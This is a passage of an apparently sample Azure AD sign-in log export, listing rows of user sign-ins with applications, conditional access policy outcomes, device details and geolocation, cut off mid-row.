+2026,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:19.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:11,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",f2f595af-13f7-418e-8782-0531ab044700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f2f595af-13f7-418e-8782-0531ab044700,SigninLogs,Sucess,40.75891113,-73.97901917
+2027,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:46.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a4c8469f-a09b-0000-5421-74c39fdf33d2,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e5b191300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,03932e54-fdb0-4c07-8405-8b9e5b191300,SigninLogs,Sucess,33.7984581,-84.38828278
+2028,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21e73fe-8173-4436-ae8c-f77c62e1c9cc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcdb0ed1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,09a9b111-0bef-49d6-ac1b-dbcdb0ed1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2029,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6c606e38-e2ec-45b7-8e5f-d5702bed042f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f84cfb21100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ec85dd07-c5e8-494c-aa5b-3f84cfb21100,SigninLogs,Sucess,33.7984581,-84.38828278
+2030,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:36.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f565726c-3dbf-4173-957b-c0b794078a93,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3f80e775-4028-4bc5-9e8b-649bee761000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3f80e775-4028-4bc5-9e8b-649bee761000,SigninLogs,Sucess,33.7984581,-84.38828278
+2031,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:01.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6c8469f-b0f2-0000-54f3-739d2a051555,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",687149c8-f736-4452-b785-99f3852a1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,687149c8-f736-4452-b785-99f3852a1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2032,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21f79b95-2592-4421-a14c-c99e880e3239,Microsoft.aadiam,Microsoft.aadiam,,Sarah Fender,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:19,"{'operatingSystem': 'Windows 10', 'deviceId': '553dab9a-8dff-4556-9a90-b8ffee6d8301', 'browser': 'Edge 18.1836', 'displayName': 'SFENDER-SP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",aef039e4-f9d5-4801-81b4-fd2696d91300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.4918212890625, 'latitude': 48.1639518737793}, 'state': 'Washington', 'city': 'Camano'}",none,none,none,none,[],{'errorCode': 0},Sarah Fender,7660009f-6dd0-46e1-a2d9-4c491787dbfc,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,aef039e4-f9d5-4801-81b4-fd2696d91300,SigninLogs,Sucess,48.16395187,-122.4918213
+2033,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:56.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d019cd63-8d09-47fc-a1ba-a26f42cf6848,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f4c49c86-cb9e-4a04-9dcc-1dcdc36f1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan 